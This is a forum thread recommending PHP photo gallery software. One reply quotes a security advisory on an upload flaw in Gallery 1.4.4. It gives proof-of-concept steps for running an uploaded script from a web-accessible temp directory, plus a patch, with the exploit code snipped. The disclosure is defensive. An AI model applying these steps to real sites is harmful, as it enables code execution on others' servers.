Which software should I use to make a photo album/gallery

[Martin]

Photoshop has that option, but I was wondering if there was anything better out there.

 

[Martin]

come on....

 

[Anubis]

Coppermine

 

[FleshLight]

Gallery!

 

[pyonir]

Originally posted by: Anubis
Coppermine

 

[DeviousTrap]

4images is the one I'd like to add.

Lots of user support for it

 

[Gooberlx2]

Originally posted by: Anubis
Coppermine

edit:
Gallery is my second choice. It has some features that I like that all the other currently lack, such as "send to online print service" and image size/resize-on-upload settings which can be set per album, etc. But, compared to the others, it's ugly and it's not database driven.

...once Gallery v2 comes out I think it will be very interesting and, providing it supports some kind of skins system, will have all the others beat.

 

[RossMAN]

MartyTheManiak, I can help you install coppermine, gallery or 4images.

Please PM me your AIM or MSN.

 

[n0cmonkey]

The PHP gallery 1.4.4 or something has a nice little vulnerability. Not sure if it has been fixed, don't care that much. Avoid it.

And, of course, wrong forum.

 

[FleshLight]

Originally posted by: n0cmonkey
The PHP gallery 1.4.4 or something has a nice little vulnerability. Not sure if it has been fixed, don't care that much. Avoid it.

And, of course, wrong forum.

Ooh what vulnerbility is this? I run gallery on one of my hosts.

 

[n0cmonkey]

Originally posted by: FleshLight

Originally posted by: n0cmonkey
The PHP gallery 1.4.4 or something has a nice little vulnerability. Not sure if it has been fixed, don't care that much. Avoid it.

And, of course, wrong forum.

Ooh what vulnerbility is this? I run gallery on one of my hosts.

Gallery (http://gallery.sf.net/) is a PHP image gallery script.
Having
permission to upload photos in some album and the temporal directory is in
the webtree, then it is possible to create a file with any extension and
content. Tested in v 1.4.4, maybe older versions also vulnerable.

When uploading photos with the "URL method", they are saved in
the temporal
directory before processing them. Any file with any content is accepted.
After downloading, the file is processed (discarded if it is not an image)
and deleted from the temporal directory.

When the script downloads the file to the temporal directory
there's the
function set_time_limit() that by default waits 30 seconds to abort the
process if no more data is recieved and the transfer connection isn't
closed. If the temporal directory is in the webtree, during this 30 seconds
timeout we can access to the file, executing it.

There's also a "directory disclosure" that I've used to
determine if the
temporal directory is in gallery's webtree. It consists in sending a longer
filename than permited by the filesystem for the image upload name.

++ How this Proof of Concept works ++

1. You need to have a fake image script (like galfakeimg.php) in
a web
accessible by gallery to download it.
2. The script searches for an Album with "everybody" permission
to add
photos.
3. Checks if the temporal directory is in the webtree.
4. Tell gallery to download the fake_photo that contains the
script.
5. After XEC_TIMEOUT seconds waiting, it executes the temp file and
test.php is created.

Usage (in my debian box):
php4 -q ./gal_poc.php "http://192.168.1.22/galfakeimg.php"
"http://127.0.0.1/gallery"

NOTE: If there are no albums with public permissions to add
photos and you
have a valid login, modify the script adding your login cookie.

++ Workaround ++

save_photos.php, line 154:

$file = $gallery->app->tmpDir . "/photo.$name";

Insert:

if(strlen($name)>20) $name=substr($name,strlen($name)-20);
if
(!acceptableFormat(strtolower(ereg_replace(".*\.([^\.]*)$", "\\1",
$name)))) die( "\nInvalid file type!\n");
$file = $gallery->app->tmpDir . "/photo.$name";

++ galfakeimg.php ++

This is the content of galfakeimg.php. It has to be placed in a
remote web
directory accessible by the gallery script.

Proof of concept code snipped.

 

[Gooberlx2]

Originally posted by: n0cmonkey
The PHP gallery 1.4.4 or something has a nice little vulnerability. Not sure if it has been fixed, don't care that much. Avoid it.

And, of course, wrong forum.

I think it's been fixed. Supposed to have been fixed with 1.4.4-pl1. Current release is 1.4.4-pl2.